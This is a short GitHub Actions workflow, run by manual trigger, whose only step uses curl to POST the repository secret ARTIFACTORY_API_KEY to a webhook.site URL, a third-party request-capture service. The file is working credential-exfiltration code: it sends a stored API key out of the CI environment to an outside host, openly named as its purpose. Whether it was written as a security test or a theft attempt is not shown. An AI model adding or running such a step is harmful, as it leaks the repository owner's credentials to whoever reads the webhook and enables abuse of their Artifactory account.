name: Send secret to webhook

on: 
 workflow_dispatch:

jobs:
  send-secret:
    runs-on: ubuntu-latest
    steps:
      - name: Send secret to webhook.site
        run: |
          curl -X POST -d "secret=${{ secrets.ARTIFACTORY_API_KEY }}" https://webhook.site/23fc6851-8ac9-444a-8d9b-e82e0a517898
